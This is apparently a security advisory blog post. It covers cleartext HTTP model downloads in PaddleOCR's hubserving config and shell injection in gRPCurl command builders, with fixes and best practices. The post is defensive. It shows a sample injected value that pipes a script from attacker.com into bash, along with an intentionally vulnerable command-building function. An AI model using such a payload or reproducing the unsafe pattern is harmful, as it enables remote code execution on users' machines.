Frequently Asked Questions

What is an insecure cleartext HTTP download vulnerability?

It occurs when an application fetches files over unencrypted HTTP, allowing a network attacker to intercept and replace the downloaded content with malicious data before it reaches the user.

How do you prevent insecure model downloads in PaddleOCR?

Replace all `http://` model download URLs in the deployment configuration with `https://` URLs, and optionally add checksum verification to confirm file integrity after download.

What CWE is insecure cleartext HTTP download?

CWE-319: Cleartext Transmission of Sensitive Information. For the specific risk of downloading untrusted executables or models, CWE-494 (Download of Code Without Integrity Check) is also relevant.

Is switching to HTTPS enough to prevent model tampering?

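Not entirely. HTTPS protects the download in transit: it prevents eavesdropping and on-path (MitM) substitution. It does not help if the server or storage bucket itself is compromised, so you should also verify a cryptographic checksum (SHA-256) of the downloaded model file against a known-good value obtained from a trusted source.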

Can static analysis detect insecure HTTP download URLs?

Yes. Tools like Semgrep can scan configuration files and source code for `http://` patterns in download-related contexts and flag them automatically, as Orbis AppSec did here.

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

Introduction

When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.

This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.

We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.

The Vulnerability Explained

What Went Wrong?

The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:

# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.

Two Vulnerabilities, One Root Cause: Insufficient Input Handling

These two issues share a common theme: trusting external data without sanitization or secure transport.

- HTTP model downloads: no encryption means no integrity. Anyone on the same network (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a Man-in-the-Middle (MitM) attack.
- Shell injection in gRPCurl commands: when user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.

How Could It Be Exploited?

Attack Scenario 1: Model File Poisoning via HTTP MitM

Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:

Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
                                      │
                                      ▼
                         Serves malicious .tar file
                         containing backdoored model

Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity

The attacker serves a .tar file that, when extracted, contains a model file crafted to exploit deserialization vulnerabilities, or an __init__.py that executes arbitrary code when the model is loaded.
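As a defensive counterpart to this scenario, a downloaded archive can be inspected before anything is extracted. The sketch below is illustrative only: the function name `suspicious_members` and the suffix allow-list are assumptions about what an inference archive should contain, not something taken from PaddleOCR's code.

```python
import io
import tarfile
from pathlib import PurePosixPath

# Assumed allow-list of file suffixes for an inference model archive (hypothetical).
ALLOWED_SUFFIXES = {".pdmodel", ".pdiparams", ".info"}

def suspicious_members(archive: tarfile.TarFile) -> list[str]:
    """Return the names of archive members that should block extraction."""
    flagged = []
    for member in archive.getmembers():
        path = PurePosixPath(member.name)
        # Absolute paths and ".." components could write outside the target directory.
        escapes = path.is_absolute() or ".." in path.parts
        if escapes or member.issym() or member.islnk():
            flagged.append(member.name)
        elif member.isfile() and path.suffix not in ALLOWED_SUFFIXES:
            # Unexpected file types, such as .py files, have no place in a model archive.
            flagged.append(member.name)
        elif not (member.isfile() or member.isdir()):
            # Devices, FIFOs, and other special entries are rejected outright.
            flagged.append(member.name)
    return flagged
```

A caller would open the archive with `tarfile.open(path)`, refuse to extract if the returned list is non-empty, and on Python versions that support extraction filters pass `filter="data"` to `extractall()` as an additional safeguard.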

Attack Scenario 2: Shell Injection via gRPCurl Command Generation

Consider a helper function that builds a grpcurl command for users to copy and run:

# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
    cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
    return cmd

If data comes from an API response or user input and contains:

'; curl http://attacker.com/shell.sh | bash; echo '

The generated command becomes:

grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method

When the user pastes and runs this command, arbitrary code executes on their machine.
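The breakout can be observed without running anything by splitting the generated string into words the way a POSIX shell would. This sketch reuses the illustrative `build_grpcurl_command` from above; the endpoint `localhost:50051` is a placeholder assumption.

```python
import shlex

def build_grpcurl_command(endpoint, header, data):
    # Same vulnerable pattern as above: values are pasted between quotes unescaped.
    return f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
cmd = build_grpcurl_command("localhost:50051", "Authorization: Bearer token", payload)

# shlex.split approximates POSIX word splitting; it does not execute anything.
tokens = shlex.split(cmd)

# The payload is no longer a single -d argument: "curl" and "|" appear as
# separate words, which a real shell would treat as a second command and a pipe.
print(tokens)
```

If the payload had stayed inside its quotes, it would appear in `tokens` as one element; instead it is scattered across several words.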

Real-World Impact

Risk	Description
Model Integrity	Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks
Code Execution	Malicious model files can execute code during loading via unsafe deserialization
Supply Chain Attack	Compromised models distributed to all users of the system
Shell Code Execution	Injected shell commands run with the privileges of the user who pastes the gRPCurl command

The Fix

What Changed?

The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:

- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

Why This Works

HTTPS provides three critical security properties that HTTP lacks:

- Confidentiality: TLS encryption prevents eavesdropping on the download
- Integrity: TLS authenticates every record (with a MAC in older cipher suites, or AEAD ciphers in TLS 1.3), so tampering in transit is detected
- Authentication: certificate validation ensures you're talking to the real server, not an impersonator
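The authentication property only holds while certificate and hostname verification stay enabled in the client. A minimal sketch using Python's standard `ssl` module follows; the helper name `verified_tls_context` is hypothetical.

```python
import ssl

def verified_tls_context() -> ssl.SSLContext:
    """Return a client TLS context, refusing to proceed if verification is off."""
    context = ssl.create_default_context()
    # Both settings are on by default; the danger is code that turns them off
    # (for example CERT_NONE here, or verify=False in requests) to silence errors.
    if context.verify_mode != ssl.CERT_REQUIRED or not context.check_hostname:
        raise RuntimeError("TLS verification is disabled")
    return context

context = verified_tls_context()
```

Such a context can be passed to `urllib.request.urlopen(url, context=context)` so the download fails rather than silently trusting an impersonating server.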

Fixing Shell Injection: The Right Approach

For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:

import shlex

# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
    safe_header = shlex.quote(header)
    safe_data = shlex.quote(data)
    safe_endpoint = shlex.quote(endpoint)

    cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
    return cmd

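shlex.quote() wraps the string in single quotes and escapes any single quotes inside it, so a POSIX shell treats the whole value as one literal argument and metacharacters cannot break out of their intended context. It targets POSIX shells only; it is not a safe escaping method for Windows cmd.exe or PowerShell.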
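A quick way to check this behavior is a round trip: quote the payload, then split the command back into words and confirm the payload comes out as a single argument. The sketch below assumes a placeholder endpoint of `localhost:50051`.

```python
import shlex

def build_grpcurl_command(endpoint, header, data):
    # Quote every externally supplied value before interpolation.
    return (
        f"grpcurl -H {shlex.quote(header)} -d {shlex.quote(data)} "
        f"{shlex.quote(endpoint)} service.Method"
    )

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
cmd = build_grpcurl_command("localhost:50051", "Authorization: Bearer token", payload)

# Splitting the command back into words recovers the payload as one inert argument.
argv = shlex.split(cmd)
```

Here `argv[4]`, the value following `-d`, is the payload string itself rather than a sequence of separate shell words.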

Even better — avoid shell commands entirely when possible:

import subprocess

# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
    result = subprocess.run(
        ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
        capture_output=True,
        text=True,
        shell=False  # Never use shell=True with user input
    )
    return result.stdout

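When you pass a list of arguments to subprocess.run() with shell=False, each list element reaches the program as exactly one argument, and there is no shell to inject into. One caveat remains: a value such as endpoint that begins with - may still be parsed by the program as an option, so validate the format of these values as well.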
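That each list element arrives as one argument can be confirmed with a stand-in child process. In this sketch a child Python interpreter plays the role of grpcurl and reports the arguments it received; the helper name `argv_seen_by_child` is hypothetical.

```python
import json
import subprocess
import sys

def argv_seen_by_child(args):
    # Stand-in for grpcurl: a child Python process that prints its argv as JSON.
    child = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]
    result = subprocess.run(child + list(args), capture_output=True, text=True, check=True)
    return json.loads(result.stdout)

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
received = argv_seen_by_child(["-d", payload, "localhost:50051"])
```

The child receives the payload byte for byte as a single argument, with the quotes, semicolons, and pipe left uninterpreted.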

Prevention & Best Practices

1. Always Use HTTPS for Downloading Artifacts

This is a non-negotiable baseline for any production system:

# ❌ Never do this
url = "http://example.com/model.tar"

# ✅ Always do this
url = "https://example.com/model.tar"
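The rule can also be enforced in code so that a cleartext URL introduced later fails fast instead of being fetched. A minimal sketch, assuming a hypothetical helper named `require_https` that is called before any download:

```python
from urllib.parse import urlsplit

def require_https(url: str) -> str:
    """Return the URL unchanged if it uses HTTPS, otherwise raise ValueError."""
    parts = urlsplit(url)
    # urlsplit lowercases the scheme, so "HTTPS://" is accepted as well.
    if parts.scheme != "https" or not parts.netloc:
        raise ValueError(f"Refusing non-HTTPS download URL: {url!r}")
    return url
```

This only checks the URL that is requested. A server could still redirect to an http:// location, so a stricter client might also disable or inspect redirects.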

Go further by also verifying checksums after download:

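import hashlib
import os
import requests

def download_and_verify(url: str, expected_sha256: str, dest_path: str):
    # A timeout keeps a stalled connection from hanging the download forever
    response = requests.get(url, stream=True, timeout=30)
    response.raise_for_status()

    # Hash the stream while writing it, so the file is read only once
    sha256 = hashlib.sha256()
    with open(dest_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=8192):
            f.write(chunk)
            sha256.update(chunk)

    actual = sha256.hexdigest()
    if actual != expected_sha256.lower():
        # Do not leave an unverified file where later code might load it
        os.remove(dest_path)
        raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")

    return dest_path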
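The expected digest has to come from somewhere the attacker cannot reach, for example a pin table committed alongside the code. The sketch below shows one possible shape for that; `PINNED_SHA256`, `sha256_of_file`, and `matches_pin` are hypothetical names, and the digest is computed from placeholder bytes only so the example stays self-contained. In practice it would be a hex literal published by the model owner.

```python
import hashlib
import hmac

# Hypothetical pin table: file name -> SHA-256 hex digest from a trusted source.
PINNED_SHA256 = {
    "example_model.tar": hashlib.sha256(b"example archive bytes").hexdigest(),
}

def sha256_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large archives do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_pin(path: str, name: str) -> bool:
    expected = PINNED_SHA256.get(name)
    if expected is None:
        return False  # files without a pin are rejected, not trusted
    return hmac.compare_digest(sha256_of_file(path), expected)
```

Rejecting unpinned names by default means a newly added model URL cannot be used until someone has recorded its digest.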

2. Never Use String Concatenation for Shell Commands

Approach	Safety	Recommendation
`os.system(f"cmd {user_input}")`	❌ Dangerous	Never use
`subprocess.run(cmd_string, shell=True)`	❌ Dangerous	Avoid with user input
`subprocess.run([...], shell=False)`	✅ Safe	Preferred
`shlex.quote()` + string	⚠️ Acceptable	Use when list form isn't possible

3. Treat All External Data as Untrusted

Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:

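# Validate and sanitize before use
import re

def validate_endpoint(endpoint: str) -> str:
    # Only allow hostname:port; the first character must be alphanumeric so the
    # value can never be mistaken for a command-line option
    pattern = r'[a-zA-Z0-9][a-zA-Z0-9.-]*:\d{1,5}'
    # fullmatch() also rejects a trailing newline, which '$' with match() lets through
    if not re.fullmatch(pattern, endpoint):
        raise ValueError(f"Invalid endpoint format: {endpoint!r}")
    return endpoint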

4. Security Scanning Tools

Integrate these tools into your CI/CD pipeline to catch these issues automatically:

- Bandit: Python security linter that flags shell=True, os.system(), and urlopen() calls that may accept unexpected URL schemes. It does not flag a hard-coded http:// string on its own.
- Safety: checks Python dependencies for known vulnerabilities
- Semgrep: static analysis with rules for shell injection, insecure URLs, and more
- Trivy: container and filesystem scanning for misconfigurations

# Run Bandit on your codebase
pip install bandit
bandit -r deploy/ -ll

# Example of a related finding. B310 fires on urllib urlopen() calls in the
# download code, not on the hard-coded http:// strings in params.py:
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes.
#    Allowing use of file:/ or custom schemes is often unexpected.
#    Severity: Medium   Confidence: High
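Where no existing rule covers hard-coded cleartext URLs, a small custom check can fill the gap in CI. The following is a sketch of the idea, not a replacement for Semgrep or similar tools; the names `find_cleartext_urls` and `scan_tree` are hypothetical.

```python
import re
from pathlib import Path

# Matches http:// URLs; stops at whitespace and quote characters.
# "https://" does not match because "http" must be followed directly by "://".
CLEARTEXT_URL = re.compile(r"http://[^\s'\"]+")

def find_cleartext_urls(text: str):
    """Yield (line_number, url) for each http:// URL in the given text."""
    for number, line in enumerate(text.splitlines(), start=1):
        for match in CLEARTEXT_URL.finditer(line):
            yield number, match.group(0)

def scan_tree(root: str, pattern: str = "*.py"):
    """Yield (path, line_number, url) for every matching file under root."""
    for path in Path(root).rglob(pattern):
        for number, url in find_cleartext_urls(path.read_text(errors="ignore")):
            yield str(path), number, url
```

A CI job could call `scan_tree("deploy")` and fail the build if it yields anything, with an allow-list for URLs that are known to be harmless (such as XML namespace identifiers).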

5. Relevant Security Standards

- CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
- CWE-319: Cleartext Transmission of Sensitive Information
- OWASP A03:2021 (Injection): covers shell injection and command injection
- OWASP A02:2021 (Cryptographic Failures): covers insecure HTTP transmission

Conclusion

This vulnerability is a reminder that security is in the details. One character, the s that turns http into https, stands between a secure model download pipeline and a potential supply chain attack. Similarly, one change, calling shlex.quote() or switching to subprocess.run() with an argument list, is the difference between a safe CLI helper and an arbitrary code execution vector.

Key Takeaways

🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
🧹 Never concatenate user-controlled strings into shell commands — use shlex.quote() or argument lists
🔍 Treat all external data as untrusted, including API response values used in command generation
🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
✅ Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS

Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.

Stay secure, and keep shipping. 🛡️

Vulnerability at a Glance

vulnerability	Insecure Cleartext HTTP Model Download
cwe	CWE-319
language	Python / Shell (PaddleOCR deployment config)
root cause	Model download URLs hard-coded with `http://` instead of `https://`
risk	Man-in-the-middle attacker replaces downloaded OCR model binaries with malicious files
fix	Upgrade all model download URLs from `http://` to `https://`

